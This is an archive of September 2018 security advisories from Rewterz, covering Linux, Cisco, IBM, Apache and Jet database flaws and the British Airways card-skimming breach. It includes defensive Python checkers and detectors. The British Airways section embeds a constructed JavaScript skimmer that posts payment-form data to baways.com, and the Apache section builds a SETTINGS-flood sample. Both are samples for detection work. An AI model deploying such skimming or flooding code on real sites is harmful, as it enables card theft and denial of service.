Archive for September, 2018

Rewterz Threat Advisory – CVE-2018-17182 – Linux kernel “vmacache_flush_all()” Use-After-Free Vulnerability

A local user may gain elevated privileges by exploiting a use-after-free in the Linux kernel's per-task VMA cache.

IMPACT:  HIGH

PUBLISH DATE:  28-09-2018

OVERVIEW

A flaw in the Linux kernel's VMA cache (mm/vmacache.c) can be exploited by a local user to trigger a use-after-free, resulting in a Denial of Service (kernel crash) or, with a working exploit, elevated privileges. Fixed releases are available for all affected stable branches.

ANALYSIS

The flaw was reported by Google Project Zero. Each task keeps a small cache of recently looked-up virtual memory areas (VMAs), tagged with the sequence number of the owning mm. The mm's sequence number is incremented on every invalidation of the memory map (for example when a mapping is removed), and a task whose cached sequence number differs from the mm's discards its cache on the next lookup. The counter is a 32-bit sequence number, not a reference count, and only when it wraps to zero is vmacache_flush_all() called to clear the caches of every thread sharing the mm. Because the counter has to be wrapped by the attacker's own process, exploitation needs a process that runs long enough to perform on the order of 2^32 invalidations; this slows the attack down but does not prevent it.

The vmacache_flush_all() function in mm/vmacache.c mishandles this sequence number overflow. A local attacker can trigger a use-after-free of an already freed VMA, and possibly gain privileges, through a particular sequence of thread creation, map, unmap, invalidation and dereference operations. The upstream fix removes vmacache_flush_all() entirely and widens the sequence number to 64 bits so that it cannot wrap in practice.

Exploitation of this vulnerability may have a high impact on the confidentiality, integrity and availability of the compromised device.

AFFECTED PRODUCTS

Linux Kernel 3.16.x

Linux Kernel 4.4.x

Linux Kernel 4.9.x

Linux Kernel 4.14.x

Linux Kernel 4.18.x

UPDATE

Update to the first fixed release of the stable branch you run:

Versions 4.18.x:

Update to version 4.18.9

Versions 4.14.x:

Update to version 4.14.71

Versions 4.9.x:

Update to version 4.9.128

Versions 4.4.x:

Update to version 4.4.157

Versions 3.16.x:

Update to version 3.16.58

Distribution kernels (Red Hat, Debian, Ubuntu, SUSE and others) carry their own version numbers and usually backport the fix rather than moving to these upstream releases, so check the distribution's advisory for CVE-2018-17182 rather than comparing the output of uname -r against the numbers above. A reboot into the fixed kernel is required; updating the package alone leaves the running kernel vulnerable.
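The following is an added example, not Rewterz or kernel.org code, that turns the fixed-release table above into a check of a running kernel's version string. The FIXED table is the advisory's; the parsing of distribution suffixes and the separate "vulnerable-by-version" and "unknown" verdicts are this example's own design, and they exist precisely because a distribution kernel's number says nothing about whether the fix was backported.

```python
"""Version check for CVE-2018-17182 against the fixed stable releases listed
above. Added example; not Rewterz or kernel.org code. The FIXED table is the
advisory's; the release-string parsing and the 'unknown' verdict for branches
outside the table are this example's own design."""
import platform
import re

# First fixed release of each upstream stable branch named in the advisory.
FIXED = {
    (3, 16): (3, 16, 58),
    (4, 4): (4, 4, 157),
    (4, 9): (4, 9, 128),
    (4, 14): (4, 14, 71),
    (4, 18): (4, 18, 9),
}

# major.minor[.patch] followed by an optional distribution suffix (-generic, +, ~bpo...).
_RELEASE_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:([-+~]).*)?$")


def parse_release(release):
    """Split a `uname -r` string into ((major, minor, patch), has_suffix).
    '4.14.70-1-lts' -> ((4, 14, 70), True); a missing patch level counts as 0."""
    m = _RELEASE_RE.match(release.strip())
    if not m:
        raise ValueError("unrecognised kernel release string: %r" % release)
    version = (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))
    return version, m.group(4) is not None


def assess(release):
    """Return 'fixed', 'vulnerable', 'vulnerable-by-version' or 'unknown'.

    'vulnerable-by-version' is returned for kernels carrying a distribution
    suffix whose upstream number is below the fix: distributions usually
    backport the fix without bumping that number, so the distribution advisory
    for CVE-2018-17182 is authoritative. 'unknown' means the branch is not in
    the table (a stable series the advisory does not list, or one released
    after the fix, e.g. 4.19), so the table cannot decide."""
    (major, minor, patch), has_suffix = parse_release(release)
    fixed = FIXED.get((major, minor))
    if fixed is None:
        return "unknown"
    if (major, minor, patch) >= fixed:
        return "fixed"
    return "vulnerable-by-version" if has_suffix else "vulnerable"


if __name__ == "__main__":
    running = platform.release()
    print("%s: %s" % (running, assess(running)))
```

Run it on each host (or feed it the uname -r output collected by your inventory tool); treat "vulnerable" as a firm finding, "vulnerable-by-version" and "unknown" as a prompt to look up the distribution's own advisory.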

 

 

 

If you think you are a victim of a cyber-attack, immediately send an e-mail to info@rewterz.com.


Rewterz Threat Advisory – CVE-2018-0470 – Cisco IOS XE HTTP Packet Processing Denial of Service Vulnerability

A vulnerability has been reported in Cisco IOS XE, which can be exploited by an unauthenticated remote attacker to cause a DoS (Denial of Service).

IMPACT:  NORMAL

PUBLISH DATE:  27-09-2018

OVERVIEW

An error in the web framework of Cisco IOS XE when processing HTTP packets can be exploited to cause a buffer overflow via a specially crafted HTTP packet, resulting in a Denial of Service. The vendor has released updates for the vulnerability.

ANALYSIS

An unauthenticated remote attacker could cause a buffer overflow condition on an affected device by exploiting a vulnerability in the web framework of Cisco IOS XE Software, resulting in a denial of service (DoS) condition.

The vulnerability is due to improper parsing of malformed HTTP packets sent to an affected device for processing. An attacker exploits it by sending crafted HTTP packets to the device; successful exploitation triggers a buffer overflow and a DoS condition. No credentials and no user interaction are needed.

Successful exploitation requires the HTTP Server feature to be enabled; devices on which it is disabled are not exploitable. On IOS XE, show ip http server status reports whether the HTTP and HTTPS servers are enabled, and if the web UI is not needed, no ip http server and no ip http secure-server turn them off and remove the attack surface entirely.

AFFECTED PRODUCTS

Cisco IOS XE Denali 16.3.x

Cisco IOS XE 3.2.x

UPDATE

Follow the vendor's advisory to determine the running release of your device, whether it is affected, and which fixed release to install:

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180926-webdos


Rewterz Threat Advisory – CVE-2018-1820 – IBM WebSphere Portal Cross-Site Scripting Vulnerability

A vulnerability has been reported in IBM WebSphere Portal, which can be exploited by malicious people to conduct cross-site scripting attacks.

IMPACT:  NORMAL

PUBLISH DATE: 26-09-2018

OVERVIEW

An update is available for IBM WebSphere Portal, several versions of which are vulnerable to cross-site scripting.

ANALYSIS

Affected versions of IBM WebSphere Portal do not properly neutralize user-controlled input before it is rendered in the Web User Interface, so an attacker can embed arbitrary JavaScript in the page. The script runs in the victim's browser within the victim's authenticated Portal session, altering the intended functionality of the interface and potentially disclosing credentials or session data within that trusted session. The vendor has released updates for the affected versions.

AFFECTED PRODUCTS

IBM WebSphere Portal 9.0.0.0 – 9.0.0.0 CF16

IBM WebSphere Portal 8.5.0.0 – 8.5.0.0 CF16

IBM WebSphere Portal 8.0.0.0 – 8.0.0.1 CF23

MITIGATION

There is no mitigation or workaround for this vulnerability; the only remedy is to apply the vendor's updates.

UPDATES

The vendor has released updates for the affected products; the list of fixes and the installation instructions are in the IBM security bulletin linked below.

https://www-01.ibm.com/support/docview.wss?uid=ibm10732287


Rewterz Threat Advisory – CVE-2018-11763 – Apache HTTP Server SETTINGS Frames Denial of Service Vulnerability

A vulnerability has been reported in Apache HTTP Server, which can be exploited by malicious people to cause a DoS (Denial of Service).

IMPACT:  NORMAL

PUBLISH DATE: 26-09-2018

OVERVIEW

In Apache HTTP Server 2.4.17 to 2.4.34, a client can keep an HTTP/2 connection busy indefinitely by sending a continuous stream of maximum-size SETTINGS frames. Each frame is processed by the server, so the connection never becomes idle and the connection timeout never fires; enough such connections tie up the server's worker threads and CPU time. Only servers that have enabled the h2 protocol are affected.

ANALYSIS

The vulnerability lies in the HTTP/2 SETTINGS frame handling of mod_http2, the module that implements the h2 protocol in Apache HTTP Server 2.4.

SETTINGS frames carry connection parameters and a peer may send them at any time. Affected versions keep processing them for as long as the client keeps sending them, and that activity prevents the idle timeout from taking effect, so a single malicious client can hold a connection and its server thread open for an unbounded time without ever issuing a request. Repeating this across many connections denies service to legitimate clients.

Successful exploitation requires that the h2 protocol is enabled on the server. The vulnerability is reachable over the network and requires no privileges or user interaction.
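The following is an added example, not Apache httpd or Rewterz code, showing what the traffic pattern above looks like on the wire and how to flag it in a captured client-to-server HTTP/2 byte stream. It parses the 9-byte frame header defined by RFC 7540 and reports a connection in which non-ACK SETTINGS frames dominate and no request is ever opened. Assumptions: the stream is one decrypted (or h2c) connection starting with the client preface, the thresholds are illustrative, and the sample traffic is constructed here rather than captured from a live server.

```python
"""Detect the HTTP/2 SETTINGS-flood pattern of CVE-2018-11763 in a captured
client-to-server byte stream. Added example; not Apache httpd or Rewterz code.
Assumptions: the stream is one decrypted (or h2c) connection starting with the
client preface; the flood thresholds are illustrative and the sample traffic is
constructed here, not captured from a live server."""
import struct

PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"
HEADER_LEN = 9                     # 24-bit length, 8-bit type, 8-bit flags, 32-bit stream id
TYPE_DATA, TYPE_HEADERS, TYPE_SETTINGS = 0x0, 0x1, 0x4
FLAG_ACK = 0x1                     # on SETTINGS: acknowledges the peer's SETTINGS
DEFAULT_MAX_FRAME_SIZE = 16384     # RFC 7540 default; a SETTINGS payload is 6 bytes per setting
SETTING_LEN = 6


def parse_frames(stream):
    """Return a list of (type, flags, stream_id, payload) from a raw h2 stream.
    Stops at the first truncated frame so a partial capture is still usable."""
    if stream.startswith(PREFACE):
        stream = stream[len(PREFACE):]
    frames, off = [], 0
    while off + HEADER_LEN <= len(stream):
        length = int.from_bytes(stream[off:off + 3], "big")
        ftype, flags = stream[off + 3], stream[off + 4]
        stream_id = struct.unpack(">I", stream[off + 5:off + 9])[0] & 0x7FFFFFFF
        payload = stream[off + HEADER_LEN:off + HEADER_LEN + length]
        if len(payload) < length:
            break
        frames.append((ftype, flags, stream_id, payload))
        off += HEADER_LEN + length
    return frames


def is_settings_flood(frames, min_settings=8, min_ratio=0.9):
    """True when non-ACK SETTINGS frames dominate the connection.
    A well-behaved client sends one SETTINGS frame at connection start and an
    empty ACK, then HEADERS/DATA for its requests. The attack sends SETTINGS
    frame after SETTINGS frame, so the connection stays busy while carrying no
    request at all; the ratio test catches exactly that shape."""
    settings = [f for f in frames if f[0] == TYPE_SETTINGS and not f[1] & FLAG_ACK]
    if len(settings) < min_settings:
        return False
    return len(settings) / len(frames) >= min_ratio


def build_frame(ftype, flags, stream_id, payload):
    """Encode one frame; used only to construct the samples below."""
    return (len(payload).to_bytes(3, "big") + bytes([ftype, flags])
            + struct.pack(">I", stream_id) + payload)


# Constructed samples. One setting: SETTINGS_INITIAL_WINDOW_SIZE (0x4) = 65535.
_one_setting = struct.pack(">HI", 0x4, 65535)
# HEADERS with END_STREAM|END_HEADERS carrying HPACK static-table indices for
# ':method: GET' (2), ':scheme: http' (6) and ':path: /' (4).
NORMAL_CLIENT = (PREFACE
                 + build_frame(TYPE_SETTINGS, 0, 0, _one_setting)
                 + build_frame(TYPE_SETTINGS, FLAG_ACK, 0, b"")
                 + build_frame(TYPE_HEADERS, 0x5, 1, b"\x82\x86\x84"))
# Largest SETTINGS payload that fits the default frame limit: 2730 settings = 16380 bytes.
_max_settings = _one_setting * (DEFAULT_MAX_FRAME_SIZE // SETTING_LEN)
FLOOD_CLIENT = PREFACE + build_frame(TYPE_SETTINGS, 0, 0, _max_settings) * 50


if __name__ == "__main__":
    for name, sample in (("normal", NORMAL_CLIENT), ("flood", FLOOD_CLIENT)):
        frames = parse_frames(sample)
        print("%s: %d frames, settings flood: %s" % (name, len(frames), is_settings_flood(frames)))
```

The ratio test is deliberately simple: a legitimate client has no reason to send more than a handful of SETTINGS frames over the life of a connection, so a stream that is almost nothing but SETTINGS is the attack regardless of how large the individual frames are.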

 

 

 

AFFECTED PRODUCTS

Apache HTTP Server 2.4.x

(The vulnerability is reported in versions 2.4.34, 2.4.33, 2.4.30, 2.4.29, 2.4.28, 2.4.27, 2.4.26, 2.4.25, 2.4.23, 2.4.20, and 2.4.18.)

(The httpd packages in Red Hat Enterprise Linux 7 and earlier do not include support for HTTP/2 and hence are not affected by this issue.)

UPDATES

Update to version 2.4.35, which contains the fix. Refer to the following links for downloads and installation help:

http://httpd.apache.org/download.cgi

https://websiteforstudents.com/apache2-http-server-2-4-35-released-heres-how-to-install-upgrade-on-ubuntu-16-04-18-04-lts/

MITIGATION

Apart from updating to the patched version, the only mitigation is to not enable the h2 protocol. In the server configuration this means leaving h2 (and h2c, the cleartext variant, which is served by the same module) out of the Protocols directive, for example Protocols http/1.1, or not loading mod_http2 at all; httpd -M lists the loaded modules and shows whether http2_module is active.

 


Rewterz Threat Advisory – Microsoft Windows 7 Jet Database Engine Out-Of-Bounds Memory Access Vulnerability

A vulnerability has been reported in the Microsoft Windows JET Database Engine, which can be exploited by malicious people to execute arbitrary code on a user's system.

IMPACT:  NORMAL

PUBLISH DATE:  25-09-2018

OVERVIEW

A vulnerability in the Microsoft Windows JET Database Engine could allow remote code execution. Many applications, including Microsoft Access, Microsoft Visual Basic and third-party software, use the JET Database Engine for data access. Successful exploitation lets an attacker execute arbitrary code in the context of the process that opened the malicious data, with the privileges of that process.

Depending on those privileges, this may allow installing programs; viewing, changing or deleting data; or creating new accounts with full user rights. Processes that run with administrative privileges are correspondingly more dangerous if exploited.

The attack requires user interaction: the targeted user must open a malicious file or visit a malicious page. The specific flaw exists within the management of indexes in the Jet database engine. Crafted data in a database file can trigger a write past the end of an allocated buffer, which an attacker can leverage to execute code under the context of the current process.

ANALYSIS

The vulnerability is an out-of-bounds write in the handling of indexes. It can be triggered when a user is convinced to open a specially crafted Jet data source via OLEDB.

Microsoft had already patched two other issues in the Jet engine in its September release. Those were buffer overflows; this additional bug is a distinct out-of-bounds write, again reachable by opening a Jet data source via OLEDB.

The vulnerability is triggered when a user opens a specially crafted file containing data stored in the JET database format. At a minimum this crashes the process that opened the file (a Denial of Service); with a suitably crafted index it can be turned into code execution as described above.

This crash is yielded by the issue:

AFFECTED PRODUCTS

Microsoft Windows 7

(Note: Only Windows 7 has been confirmed vulnerable, but the exploited component is included in all supported versions of Windows, including server editions.)

MITIGATION

No patch for the vulnerability has been released yet; Microsoft is expected to fix it in the October patch release. Until then, the only defence is caution: do not open Jet database files (for example Access .mdb files) or data sources that load them via OLEDB unless they come from a trusted source, and treat such files arriving by email or download as suspect.

The Zero Day Initiative's advice is the same: given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the application to trusted files.
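Restricting the application to trusted files is hard to enforce by filename alone, because the Jet engine is handed a path and does not care what extension it carries. The following added example (not Microsoft, ZDI or Rewterz code) identifies Jet-format files by their content so that a mail gateway or download filter can hold them until the patch ships. Assumptions: Access/Jet files begin with a 4-byte page header (00 01 00 00) followed by the signature "Standard Jet DB" (Jet 3/4, .mdb) or "Standard ACE DB" (Access 2007 and later, .accdb); the policy, the verdict names and the sample files are this example's own, and the samples are constructed rather than real databases.

```python
"""Content-based identification of Jet database files for the interim period
before Microsoft's patch. Added example; not Microsoft, ZDI or Rewterz code.
Assumptions: Access/Jet files begin with a 4-byte page header (00 01 00 00)
followed by the signature 'Standard Jet DB' (Jet 3/4, .mdb) or 'Standard ACE DB'
(Access 2007+, .accdb); the attachment policy and verdict names are this
example's own. The samples below are constructed, not real database files."""
import os

JET_SIGNATURES = (b"Standard Jet DB\x00", b"Standard ACE DB\x00")
JET_EXTENSIONS = {".mdb", ".mde", ".accdb", ".accde"}
PAGE_HEADER = b"\x00\x01\x00\x00"


def is_jet_file(data):
    """True when the first 20 bytes carry a Jet/ACE page-0 signature."""
    return data[:4] == PAGE_HEADER and data[4:20] in JET_SIGNATURES


def triage(filename, data):
    """Classify a file for a 'no Jet databases from outside' policy.

    Returns 'jet' for a database with a database extension, 'jet-disguised'
    when Jet content hides behind another extension (a renamed file still
    opens through the Jet OLEDB provider, which reads the path it is given and
    does not insist on .mdb), and 'not-jet' otherwise. An extension-only
    filter would miss the second class."""
    ext = os.path.splitext(filename.lower())[1]
    if is_jet_file(data):
        return "jet" if ext in JET_EXTENSIONS else "jet-disguised"
    return "not-jet"


def triage_batch(attachments):
    """attachments: iterable of (filename, bytes). Returns the names to hold."""
    return [name for name, data in attachments if triage(name, data) != "not-jet"]


# Constructed samples (one 4 KiB page each, zero-filled after the signature).
PAGE_SIZE = 4096
SAMPLE_MDB = PAGE_HEADER + JET_SIGNATURES[0] + b"\x00" * (PAGE_SIZE - 20)
SAMPLE_ACCDB = PAGE_HEADER + JET_SIGNATURES[1] + b"\x00" * (PAGE_SIZE - 20)
SAMPLE_PDF = b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n"

if __name__ == "__main__":
    batch = [("report.mdb", SAMPLE_MDB), ("invoice.pdf", SAMPLE_ACCDB), ("notes.pdf", SAMPLE_PDF)]
    for name, data in batch:
        print(name, triage(name, data))
    print("hold:", triage_batch(batch))
```

Only the first 20 bytes of each file are needed, so the check is cheap enough to run on every attachment; the "jet-disguised" verdict is the one worth alerting on, since a Jet file that pretends to be something else has no legitimate reason to arrive that way.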

 

 

 



British Airways faces Data Breach of 380,000 Accounts

Malicious JavaScript planted within British Airways' website, and loaded by its mobile app as well, skimmed the payment details of around 380,000 accounts.

RELEASE DATE: September 14th, 2018

INCIDENT

Starting from August 21st, around 380,000 accounts were compromised in a major data breach of British Airways that exposed customers' information. The security firm RiskIQ attributes the breach to the Magecart group, which was also behind the Ticketmaster UK breach earlier this year.

The attackers obtained customers' names, street and email addresses, and card numbers with expiry dates and security codes (CVV), which is everything needed to make fraudulent card-not-present payments.

British Airways stated that all payment information processed through the airline's website and mobile app between August 21st and September 5th had been exposed.

ATTACK VECTOR

The evidence shows that malicious JavaScript had been planted within British Airways' website.

Magecart has traditionally stolen data by injecting a malicious script into payment forms, copying what the customer enters into the form to a server the attackers control.

RiskIQ further reported that the attackers needed only 22 lines of code to capture the data (attached below).

The attack compromised British Airways' own web server, making it a highly targeted attack aimed at this particular website and its mobile application.

"This skimmer is attuned to how British Airways' payment page is set up, which tells us that the attackers carefully considered how to target this site in particular," said Yonathan Klijnsma, head researcher at RiskIQ.

ROOT CAUSE

The attack was attributed to Magecart because it is web-based, targets payment card data and matches the group's tradecraft. The attackers studied the unique structure and functionality of the British Airways website and exploited its security lapses. RiskIQ crawled the scripts on the British Airways site and traced how they changed over time; in doing so the researchers found a modified script on the compromised site.

The modified script was a legitimate JavaScript library served from BA's own site (RiskIQ identified it as a copy of Modernizr) to which the skimmer code had been appended, so it loaded and ran alongside the page's other first-party scripts. The skimmer sent the stolen data to a server at baways.com, a domain chosen to resemble the airline's own, hosted on a virtual private server at a provider in Lithuania and using a TLS certificate issued through Comodo on August 15 so that the exfiltration traffic looked like ordinary HTTPS.

When a customer enters information on the website's payment form and clicks "submit", the 22 lines of code serialize the entered fields as a JSON object and send it to the malicious server.

The customer's transaction is not disturbed and appears to take place over a secure session while the attackers receive a full copy of the payment information. The attackers also added a "touchend" callback to the script so that it fires on touch-screen devices, extending the attack to BA's mobile app, which loaded the same modified script.

LESSON LEARNED

British Airways appears to have been operating without visibility into its Internet-facing web assets: nobody was watching the scripts served on the payment page for changes, so the compromise went undetected for more than two weeks and was found only after the damage was done.

With so many attack vectors and ever-evolving techniques, organizations must make sure their security programme covers the client side of payment pages as well as the servers: keep an inventory of every script loaded on those pages, monitor them for unexpected changes (Subresource Integrity hashes let the browser refuse a modified library), restrict with a Content Security Policy where scripts may load from and where the page may send data, and test regularly. With such measures, visibility and regular penetration testing, attacks like this can be caught before they cause damage.
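The following is an added example, not RiskIQ's, British Airways' or Rewterz's code, of two of the controls above. sri_hash() produces the Subresource Integrity value a page can pin a first-party library to, so a browser rejects a copy that has been altered on the server, and exfil_hosts() scans script text for network destinations outside an allowlist, the kind of change RiskIQ found by crawling the site. Assumptions: the skimmer sample is a constructed illustration of the behaviour described above (serialise the form, send it as JSON to baways.com), not the 22-line script itself; the path it posts to and the allowlisted host are hypothetical.

```python
"""Two client-side controls against the script modification described above.
Added example; not RiskIQ's, British Airways' or Rewterz's code. The skimmer
sample is a constructed illustration, not the real 22-line script; the path it
posts to and the allowlisted hosts are hypothetical."""
import base64
import hashlib
import hmac
import re


def sri_hash(script_bytes, algo="sha384"):
    """Value for <script integrity="...">: '<algo>-<base64 digest>'."""
    digest = hashlib.new(algo, script_bytes).digest()
    return "%s-%s" % (algo, base64.b64encode(digest).decode("ascii"))


def integrity_matches(expected, served_bytes):
    """Compare the served copy against the pinned value; this is what a browser
    does before executing a script that carries an integrity attribute."""
    algo = expected.split("-", 1)[0]
    return hmac.compare_digest(sri_hash(served_bytes, algo), expected)


_URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
_SEND_SINKS = ("XMLHttpRequest", "fetch(", "sendBeacon", ".ajax(", ".post(")


def exfil_hosts(script_text, allowed_hosts):
    """Hosts a script can send data to that are outside the allowlist.

    Only scripts containing a network-send sink are examined, so a script that
    merely mentions a URL in a string is not reported; subdomains of allowed
    hosts are accepted."""
    if not any(sink in script_text for sink in _SEND_SINKS):
        return set()
    found = {h.lower() for h in _URL_RE.findall(script_text)}
    return {h for h in found if not any(h == a or h.endswith("." + a) for a in allowed_hosts)}


# Constructed samples.
LEGIT_LIBRARY = b"window.Modernizr = {touch: 'ontouchstart' in window};\n"
SKIMMER_SNIPPET = """
window.onload = function () {
  jQuery('#submitButton').on('click touchend', function () {
    var n = {};
    jQuery('#paymentForm').serializeArray().map(function (i) { n[i.name] = i.value; });
    setTimeout(function () {
      jQuery.ajax({type: 'POST', url: 'https://baways.com/collect', data: JSON.stringify(n)});
    }, 500);
  });
};
"""
ALLOWED = {"britishairways.com"}

if __name__ == "__main__":
    pinned = sri_hash(LEGIT_LIBRARY)
    tampered = LEGIT_LIBRARY + SKIMMER_SNIPPET.encode()
    print("pinned:", pinned)
    print("tampered copy accepted:", integrity_matches(pinned, tampered))
    print("exfil hosts:", exfil_hosts(tampered.decode(), ALLOWED))
```

SRI only helps when the integrity attribute lives somewhere the attacker did not also change, and it does nothing for inline scripts, so pair it with a Content Security Policy whose connect-src and form-action directives name only the hosts the page legitimately talks to; the allowlist used by exfil_hosts() is the same list those directives should contain.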

 


Copyright © Rewterz. All rights reserved.